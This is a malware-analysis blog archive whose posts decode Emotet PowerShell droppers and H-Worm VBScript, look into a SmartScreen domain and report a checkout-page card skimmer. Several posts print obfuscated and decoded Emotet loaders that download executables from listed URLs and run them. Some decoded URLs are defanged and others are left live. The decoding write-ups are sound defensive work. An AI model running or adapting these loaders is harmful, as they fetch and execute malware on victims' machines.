Tuesday, July 10, 2018

July Emotet Encoded Powershell Observed

I love taking the time to de-obfuscate newly observed scripts, and Emotet gives me plenty of opportunity to do this. As I posted last month, there are a number of ways to decode these, and I could simply run them through a sandbox, but I like to really understand the obfuscation for myself, which is why I take the time to reverse it a little and to share how I go about it.

I will say that since I started using CyberChef, it almost feels like cheating in a way. I had a Python script that I kept updating to look for signs of known Emotet encodings I had observed and then decode them; I was up to version 8 of that script. I still write this stuff to keep in practice, but I find CyberChef to be a much faster way of "writing" a decoder of sorts.

So, the new variant I had observed looks like this:

powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( 'RVDbagIxEP2VfQhEsZv0oVAwLAi1F6QthUXE0pdJdupGs0nMjm5F/PeuUizM0zlzLjPMfj4XHrs86DUayt6RxAL1g7PoSbHXGRW8JopjKWOyDabowAcR0koutZz8UbDHHDwJExq5u6LNDizVYEV0UlddC/+CdQPNrrUGnFhH2YVUxYRtK7uYm+Cpz5aP5rYsrwIPq3CAxprN4ZJiwNS41S6spJ4uZm/zqeSijM7SgE/4UDHTzrMi4/d3XDGqtgVDvx8TNnHEv/joTI+4wB/k6jsk7N0G7MX6rJ/z0cMjpcOR9c8R09B5F6B6sg4vOzfZ2XCoSoJE+UcKpm9+wZTunTbqZIBMfTydfgE=' ), [IO.comprEsSION.CompREssIONmoDE]::dECoMprEsS ) | fOREACH-OBject{ nEW-obJeCt SySteM.io.StREamreAder($_, [SyStem.tEXt.EncodiNg]::ASCIi ) } | FOReaCH-ObjEcT{ $_.rEADToENd( ) }) |. ( $eNv:CoMspeC[4,24,25]-join'')

The first thing to notice is the base64 string handed to [Convert]::FromBase64String. Decoding it on its own, however, does not give back a script; base64 -d from the command line produces binary:

(binary output: the decoded bytes are a raw DEFLATE stream, so they render as non-printable garbage rather than text)

That is not very helpful on its own, but the next clue is right there in the command: the decoded bytes are wrapped in a System.IO.Compression.DeflateStream with CompressionMode Decompress and read back through a StreamReader, so the base64 hides a compressed script, not a plain one. The tail of the command is also worth a look: $env:COMSPEC[4,24,25] -join '' indexes the characters of C:\Windows\system32\cmd.exe to spell iex, so the decompressed text is piped straight into Invoke-Expression without the string "iex" ever appearing in the command.

This isn't new to me; I've observed similar tactics being used with tools like PowerSploit, and a quick Python script I wrote a while back for those tactics actually works here. Forgive the long-winded approach; I never streamlined this:

echo "base64code" | base64 -d >> evilb64
python powershelldeflate2.py -i evilb64

Output:

$iZG=new-object Net.WebClient;$LJt='http://primerplano[.]org/Yb/@http://ave-ant[.]com/u/@http://muaithai[.]pl/bdwsab/@http://jmamusical[.]jp/wordpress/wp-content/Ec0SS/@http://nagoyamicky[.]com/cacheqblog/bDWJMUD/'.Split('@');$csU = '74';$tdq=$env:temp+'\'+$csU+'.exe';foreach($Hin in $LJt){try{$iZG.DownloadFile($Hin, $tdq);Start-Process $tdq;break;}catch{}}

My python script is largely based on information found here.  It attempts to use ZLIB and GZIP for decompressing the file.
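As an added worked example (my own code, not the author's powershelldeflate2.py or the CyberChef recipe below), here is a stand-alone Python decoder for this variant. It extracts the FromBase64String argument, raw-inflates it (DeflateStream writes a headerless DEFLATE stream, which is why base64 -d alone shows garbage), pulls the stage 2 URLs out of the result and resolves the $env:COMSPEC[4,24,25] trick to the cmdlet it spells. The script and URLs wrapped by build_sample_command are constructed for the demo (example.test and example.invalid are reserved, non-resolving names), and the COMSPEC path is assumed to be the standard C:\Windows\system32\cmd.exe:

```python
import base64
import re
import zlib
from typing import Dict, Optional

# Assumed default %COMSPEC% on a standard Windows install; characters 4, 24
# and 25 of this string spell "iex" (PowerShell is case-insensitive, so it runs).
DEFAULT_COMSPEC = r"C:\Windows\system32\cmd.exe"

B64_RE = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.IGNORECASE)
COMSPEC_RE = re.compile(r"\$env:comspec\[([\d,\s]+)\]", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"@,;]+", re.IGNORECASE)


def extract_base64(cmd: str) -> str:
    """Pull the payload out of [Convert]::FromBase64String('...'), whatever its casing."""
    m = B64_RE.search(cmd)
    if not m:
        raise ValueError("no FromBase64String('...') payload found")
    return m.group(1)


def inflate(data: bytes) -> bytes:
    """Decompress what a .NET DeflateStream produced.

    DeflateStream writes a raw DEFLATE stream with no zlib or gzip header,
    which is why plain base64 -d shows only binary garbage.  Raw DEFLATE is
    tried first; zlib and gzip wrappers are tried next in case a variant
    switches to GZipStream.
    """
    for wbits in (-zlib.MAX_WBITS, zlib.MAX_WBITS, 16 + zlib.MAX_WBITS):
        try:
            return zlib.decompress(data, wbits)
        except zlib.error:
            continue
    raise ValueError("payload is neither raw DEFLATE, zlib nor gzip")


def resolve_comspec_alias(cmd: str, comspec: str = DEFAULT_COMSPEC) -> Optional[str]:
    """Turn ($env:COMSPEC[i,j,k] -join '') into the cmdlet name it spells."""
    m = COMSPEC_RE.search(cmd)
    if not m:
        return None
    indices = [int(i) for i in m.group(1).split(",")]
    return "".join(comspec[i] for i in indices)


def decode_emotet_deflate(cmd: str) -> Dict[str, object]:
    """Return the second-stage script, its download URLs and the hidden launcher."""
    script = inflate(base64.b64decode(extract_base64(cmd))).decode("ascii", "replace")
    return {
        "script": script,
        "urls": URL_RE.findall(script),
        "launcher": resolve_comspec_alias(cmd),
    }


# --- constructed sample (not the observed payload) ---------------------------
SAMPLE_SCRIPT = (
    "$wc=new-object Net.WebClient;"
    "$u='http://example.test/a/@http://example.invalid/b/'.Split('@');"
    "foreach($h in $u){try{$wc.DownloadFile($h,$env:temp+'\\1.exe');break}catch{}}"
)


def build_sample_command(script: str = SAMPLE_SCRIPT) -> str:
    """Wrap a script the way the observed loader does: raw DEFLATE, then base64,
    then the DeflateStream/StreamReader pipeline ending in the COMSPEC trick."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = comp.compress(script.encode("ascii")) + comp.flush()
    b64 = base64.b64encode(raw).decode("ascii")
    return (
        "powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM("
        "[SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( '" + b64 + "' ),"
        " [IO.comprEsSION.CompREssIONmoDE]::dECoMprEsS ) | fOREACH-OBject{ nEW-obJeCt"
        " SySteM.io.StREamreAder($_, [SyStem.tEXt.EncodiNg]::ASCIi ) } |"
        " FOReaCH-ObjEcT{ $_.rEADToENd( ) }) |. ( $eNv:CoMspeC[4,24,25]-join'')"
    )


if __name__ == "__main__":
    result = decode_emotet_deflate(build_sample_command())
    print("launcher:", result["launcher"])
    for url in result["urls"]:
        print("stage 2 :", url)
```

To run it against a real sample, pass the full one-line command to decode_emotet_deflate; the regexes ignore case, so the random capitalisation Emotet applies to cmdlet and type names does not matter. If inflate raises, the payload is not a compression wrapper at all and a different variant is in play.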

Now, the other way I approached this (other than using write-host in PowerShell) was to use CyberChef to see if I could even write a recipe for this variant. Here is that recipe:

Regular_expression('User defined','\\(\\s\\\'[a-zA-Z0-9/+=]*\\\'',true,true,false,false,false,false,'List matches') Find_/_Replace({'option':'Regex','string':'[\\(\\\'\\)]'},'',true,false,true) From_Base64('A-Za-z0-9+/=',true) Raw_Inflate(0,0,'Adaptive',false,false) Split('@','\\n') Regular_expression('User defined','https?[:a-zA-Z0-9/.-]*',true,true,true,true,false,false,'List matches')

As you can see, the CyberChef output is pretty clean. As always, if anyone has better regex to use here, I enjoy optimizing these things. I hope everyone finds this useful.

Friday, June 22, 2018

New Emotet encoding observed and decoded

Nothing earth-shattering to report here; I just wanted to share the latest Emotet-encoded PowerShell command and one simple way to decode it to extract the stage 2 download links.

I know, a lot of these obfuscated PowerShell commands can be easily decoded by simply using the write-host command; however, I do like to try different ways to reverse the obfuscation, as I think it makes for a good analyst exercise.

The powershell command is encoded as:

POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68>70J4!102!106O25I77t121O30>106O4J107V67J95O95-91!17I4>4t92t92-92J5!71-66>74H74-88!88>68I72x66I74I95H78t5x72I68t70!4I98-94!24V90I67H77!104H4>107H67x95I95>91!17I4I4I95H78>88!95>5!79O66O89O64!95x94I66H91x5t69-71>4-126O18V83O104I120x4H107J67J95V95V91V17!4>4!92I92I92>5J65I83V88V95>94-79t66I68V5x89>94J4t66I92J79V114>105>4>12!5!120H91H71t66I95J3O12H107t12x2t16-15I66H91J74J92O89I11t22O11>15I77t81V95I124>96J92>5!69V78t83H95J3!26!7t11V26>27H24I19V30V25-2V16-15x102V105>77t113-108!11>22t11!15I78t69-93I17H95!78O70H91I11I0t11J12I119x12>11-0I11H15t66I91!74H92>89J11J0V11>12O5!78J83-78t12!16I77t68-89-78x74V72t67-3J15x65V120H69x123I72t11J66!69x11V15-97O88t94I74J66J2x80H95t89H82J80J15>92!64O89!122x114!5I111x68t92V69-71I68!74O79-109I66I71!78V3O15x65J120t69>123!72t5x127O68H120t95J89!66>69H76V3I2x7t11!15t102J105H77O113H108!2-16I120I95I74-89x95>6>123!89H68-72I78t88t88t11H15V102J105V77>113H108-16I73t89I78J74O64x16J86I72H74!95J72V67J80t92!89I66V95I78!6I67I68O88-95-11H15-116>5H110V83I72-78>91O95>66>68I69-5J102H78t88J88!74!76x78-16J86>86' -SplIT '>' -spLiT'X' -SpLiT '!'-sPlIt 'V' -SplIt'o' -SPLiT'i'-sPliT 'H'-SpLIT'-'-sPlit't'-sPLIt'J' |forEaCh{ [CHaR] ( $_-bXOr'0x2b' ) })+" $(SEt 'OfS' ' ') " )

There are a couple of quick things to note here which make this pretty simple to reverse. First, the chain of -split operators: each one names a delimiter ('>', 'X', '!', 'V', 'o', 'i', 'H', '-', 't', 'J'; -split is case-insensitive by default, so the lowercase 'x' and uppercase 'O' and 'I' in the blob count too), and what is left after splitting on all of them is a list of decimal values. Second, the ForEach block casts each value with [char] after XORing it with 0x2b, so the command is encoded with XOR key 0x2b. The $(sV 'ofs' '') at the front sets the output field separator to an empty string so the resulting characters are joined with nothing between them, and the trailing $(SEt 'OfS' ' ') restores the default before the assembled string is handed to iex.

There are a lot of ways to handle this, such as using the Linux tr command and friends to strip out the punctuation and alpha characters, convert the decimal values and then apply the XOR key. However, I think it's worth pointing out how to do this in CyberChef instead.

Here is a custom recipe I used in CyberChef to decode this:

Find_/_Replace({'option':'Regex','string':'[^\\w\\s]|[a-zA-Z]'},' ',true,false,true) From_Decimal('Space') XOR({'option':'Hex','string':'2b'},'Standard',true) Regular_expression('User defined','(https?\\x3a\\x2f\\x2f[wW]*\\.?[a-zA-Z0-9]+\\x2d?[a-zA-Z0-9]*\\x2e[a-zA-Z]+\\x2e?\\w*\\x2e?\\w*\\x2e?\\x2f[a-zA-Z0-9]+\\x2f)',true,true,false,true,false,false,'Highlight matches')

When applied, I get my stage2 download links:

If anyone has any improvements on the last bit of regex in the recipe, let me know; it doesn't always catch all the links.
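The same decode as an added Python example (my code, not anything from the original post or the CyberChef recipe): strip everything that is not a digit, treat each digit run as one decimal value, XOR it with the key read from the -bxor operand, and pull the URLs out of the result. Because every delimiter in the -split chain is a non-digit, taking the digit runs is equivalent to applying the whole chain regardless of which delimiter set a sample uses. The first nine values of the observed blob are kept as a known-answer check for the key; the script wrapped by build_sample_command is constructed for the demo (example.test and example.invalid are reserved, non-resolving names):

```python
import re
from typing import Dict, List

DIGITS_RE = re.compile(r"\d+")
XOR_KEY_RE = re.compile(r"-bxor\s*'?(0x[0-9a-f]+|\d+)'?", re.IGNORECASE)
BLOB_RE = re.compile(r"\[string\]\(\s*'([^']+)'", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"@,;]+", re.IGNORECASE)

# Delimiter set taken from the observed command.  PowerShell's -split is
# case-insensitive, which is why both 'x' and 'X', 'o' and 'O' occur in the blob.
DELIMITERS = ">x!VoiH-tJ"

# First nine values of the observed blob; they decode to the opening
# assignment "$fztWKw =" and serve as a known-answer check for key 0x2b.
OBSERVED_PREFIX = "15x77-81I95>124O96I92O11x22"


def find_xor_key(cmd: str) -> int:
    """Read the key from the -bxor operand; the sample writes it as the string '0x2b'."""
    m = XOR_KEY_RE.search(cmd)
    if not m:
        raise ValueError("no -bxor key in command")
    return int(m.group(1), 0)


def extract_blob(cmd: str) -> str:
    """Return the delimited decimal blob that feeds the -split chain."""
    m = BLOB_RE.search(cmd)
    if not m:
        raise ValueError("no [string]('...') blob in command")
    return m.group(1)


def decode_delimited_xor(blob: str, key: int) -> str:
    """Recover the script from '15x77-81I95>...' style data.

    Each digit run is one value; XOR it with the key and cast to a char,
    exactly as the ForEach { [char]($_ -bxor key) } block does.  A wrong key
    shows up immediately as values outside 7-bit ASCII.
    """
    values = [int(v) for v in DIGITS_RE.findall(blob)]
    bad = [v for v in values if (v ^ key) > 0x7F]
    if bad:
        raise ValueError(f"{len(bad)} values do not XOR into 7-bit ASCII; wrong key?")
    return "".join(chr(v ^ key) for v in values)


def decode_emotet_xor(cmd: str) -> Dict[str, object]:
    """Decode the whole command and pull out the stage 2 URLs."""
    script = decode_delimited_xor(extract_blob(cmd), find_xor_key(cmd))
    return {"script": script, "urls": URL_RE.findall(script)}


# --- constructed sample (not the observed payload) ---------------------------
SAMPLE_SCRIPT = (
    "$wc=new-object Net.WebClient;"
    "$u='http://example.test/a/,http://example.invalid/b/'.Split(',');"
    "foreach($h in $u){try{$wc.DownloadFile($h,$env:temp+'\\1.exe');break}catch{}}"
)


def build_sample_command(script: str = SAMPLE_SCRIPT, key: int = 0x2B) -> str:
    """Re-create the observed wrapper around a constructed script: XOR each
    character, write it as decimal, and cycle through the delimiter set."""
    parts: List[str] = []
    for i, ch in enumerate(script):
        parts.append(str(ord(ch) ^ key))
        parts.append(DELIMITERS[i % len(DELIMITERS)])
    blob = "".join(parts[:-1])  # drop the trailing delimiter
    splits = "".join(" -split '" + d + "'" for d in DELIMITERS)
    return (
        "powershell iex(\"$(sv 'ofs' '')\" +[string]( '" + blob + "'" + splits
        + " |foreach{ [char]( $_ -bxor '0x" + format(key, "x") + "' ) })"
        + "+\" $(set 'ofs' ' ') \" )"
    )


if __name__ == "__main__":
    print("known-answer:", decode_delimited_xor(OBSERVED_PREFIX, 0x2B))
    for url in decode_emotet_xor(build_sample_command())["urls"]:
        print("stage 2     :", url)
```

Reading the key from the command rather than hard-coding 0x2b means the same script keeps working when the next campaign rotates it; the 7-bit ASCII check is what tells you the key regex picked up the wrong number.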

Wednesday, May 9, 2018

What is canonicalizer.ucsuri.tcs?

Recently I have observed a few hosts which were attempting to POST data to this domain, albeit unsuccessfully, as this is not a valid domain. Everything about the data in the PCAP suggests Microsoft SmartScreen, such as the user agent and even the decoded hex in the HTTP request header:

For example:

Translates to https://ping..checkappexec.microsoft.com/windows/shell/actions

Upon further investigation, I found that several hosts were attempting to query and unsuccessfully resolve this domain. So I did some digging, and the results ranged wildly:

A Patent for reputation based software

A suggestion that this is part of a Canon printer

A couple Hybrid-analysis sandbox submissions for phishing pages where this domain was observed in DNS

And an AlienVault link which shows that this link didn't resolve even back a few years ago

Pivoting from the AlienVault link, I went to the associated VirusTotal page:

The relevant information here is:
Latest files that are not detected by any antivirus solution and embed URL pattern strings with the domain provided.

Which links here:

The piece that stands out here is the file name: ieapfltr.dll, which is part of SmartScreen.
So I figured I would pull a few known-clean hosts together, a Windows 7 and a couple of Windows 10 hosts, and sure enough they have this DLL. In each case I ran the following:

strings -el ieapfltr.dll | grep "http"
strings -el ieapfltr.dll | grep "\.tcs"

Results:
canonicalizer.ucsuri.tcs
http://canonicalizer.ucsuri.tcs

My conclusion is that this is a part of SmartScreen, but why have only a couple hosts been observed with a POST to this domain? Why are so many hosts attempting to resolve this domain? What is the purpose of this non-valid TLD anyway? I'm left with a lot of questions, but do not believe at this time that there is anything malicious about this domain. I'm hoping someone has some more information about this, if you do, please contact me.

Saturday, September 9, 2017

Capture The Flag September 2017

I'm thinking that every once in a while I'll post a CTF challenge for fun. Any CTF files will be password protected with the password "infected". While none of the files will be malicious, I still encourage use of an isolated system.

Get the file here.

Friday, September 1, 2017

Decoding the latest Emotet Powershell

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before: an email phish with a link, and the link downloads a malicious document. The document, usually a Word document, uses VBA to build and execute a PowerShell command which then downloads the next stage of the infection.

This used to be very simple to see; for example, older observed variants produced the following PowerShell:

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}} 
However, a newer variant now base64-encodes the PowerShell and passes it with -e (short for -EncodedCommand), then uses some simple string obfuscation to make identification of the stage 2 links more difficult for an analyst. One caveat when decoding on Linux: -EncodedCommand takes the base64 of the script as UTF-16LE, so base64 -d alone leaves a NUL byte after every character; pipe the output through iconv -f UTF-16LE -t UTF-8 (or tr -d '\0') to get readable text.

For example:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAB7A......................B9AH0ADQAKAA=="


echo "JAB7A......................B9AH0ADQAKAA==" | base64 -d

Output:

${wscr`I`pT} = .("{1}{0}{2}"-f 'w-','ne','object') -ComObject ("{2}{1}{0}{3}" -f 'he','ript.S','WSc','ll');${W`eb`ClIEnT} = &("{2}{1}{0}" -f 'bject','-o','new') ("{4}{0}{1}{3}{2}" -f 'W','ebCl','t','ien','System.Net.');${Ra`NDOm} = .("{1}{2}{0}" -f'w-object','n','e') ("{0}{1}" -f'r','andom');${U`RlS} = ("{4}{21}{8}{22}{14}{20}{17}{1}{5}{6}{9}{7}{15}{11}{13}{19}{10}{16}{18}{12}{3}{0}{23}{2}{24}" -f'subs','p:/','ibe/N','m/','http://bellittise','/dbflett.com/Yq','sSad/,http','//arma','rature.it/in',':','/stor','cl/R','co','fWMwd/,http:','de','dores.','e503','C/,http://bringit.pt/Hv/,htt','.','/','/','r','clu','cr','qWPC/').("{1}{0}" -f'plit','S').Invoke(',');${na`me} = ${R`AN`DOM}.("{1}{0}" -f 't','nex').Invoke(1, 65536);${Pa`Th} = ${eNV`:`Temp} + '\' + ${n`AMe} + ("{0}{1}"-f'.e','xe');foreach(${U`Rl} in ${u`Rls}){try{${We`B`CLiE`NT}.("{3}{0}{1}{2}" -f'wnlo','adF','ile','Do').Invoke(${U`Rl}.("{1}{0}{2}" -f 'in','ToStr','g').Invoke(), ${pa`Th});.("{0}{3}{4}{2}{1}" -f'Sta','ess','oc','r','t-Pr') ${P`Ath};break;}catch{&("{2}{0}{1}"-f 'ite-h','ost','wr') ${_}."e`x`cEPt`ioN"."meS`sA`gE";}}
So you could manually work through the transpositions here; however, a nice technique was shown at Myonlinesecurity.
If you don't have immediate access to PowerShell, you could also manually copy the relevant pieces into a quick Python script.
Here is an example:

The output:

Friday, June 23, 2017

Beware Compromised Shopping Carts

I think many people have stumbled upon "less than secure" sites which claim to have a secure checkout. I can't even count how many times I've looked for some obscure items on the web and have come across a website which just seems a bit off.

Yesterday I received a Snort alert which I often see on a compromised host: ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad

What I instantly noticed in the transcript is that this isn't the normal POST that I see from Zeus. What I saw was a GET request with the user's credit card and billing information in the request header. See screenshot:

I've excluded the rest of the transcript so as not to name the site, which is actually compromised at this time. However, I will say that it is very clear when looking at surrounding PCAPs from the source IP that the user was shopping for building supplies. When looking at the website's checkout page, I stumbled upon the following code:


It would appear that the site has been compromised with injected code which scrapes the billing information that users enter into the checkout page.

Just as a side note, the direct IP address being utilized in this compromise has been associated with fraudulent CC charges in the past; see abuseipdb.com.

If anyone has any more information on this malicious code, please let me know. It seems to have some similar characteristics to evil-eval-magento.js, which is also described here.

Friday, August 19, 2016

Decoding H-Worm

H-Worm, or Houdini Worm, is a VBScript which uses obfuscation techniques in an attempt to hide its code. I'm not here to reinvent the wheel; there are already good articles on H-Worm, including this FireEye article.

I will, however, point out that with the right indicators in Snort, network traffic can be used to pin down a host which may be beaconing to a known URI structure for H-Worm, including the is-ready POST indicator.

I had observed one host which had a VBS file in startup named adobe_flash_player.vbs. Since this host had tripped my Snort signature, I decided to look at this as a file of interest. This particular file had a couple of layers of obfuscation.

In this screen capture we see the file appears to be a JPG file (although it doesn't actually display; it really is just garbage).

This is an attempt to have an analyst potentially brush it off as a malformed JPG. However, if we scroll down to the end of the file we see something interesting.

When I delete all the garbage above this I end up with the following VBS.

For the purpose of saving space here, I only included a screen capture. To understand the magnitude of the aawaawaaaawaawswaaaaa string: with word wrapping removed, it is 62 pages of text.

To deobfuscate this I took note of the Execute awasw(aawaawaaaawaawswaaaaa) call and replaced it with some very common, simple code that writes the decoded layer to a file instead of running it:

outFile = "decoded.vbs"   ' where the decoded layer is written instead of being executed
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile(outFile, True)
objFile.Write awasw(aawaawaaaawaawswaaaaa) & vbCrLf   ' replaces: Execute awasw(aawaawaaaawaawswaaaaa)
objFile.Close

The result of this is.....

Hopefully this simple method for deobfuscating is found to be useful to others. Happy hunting!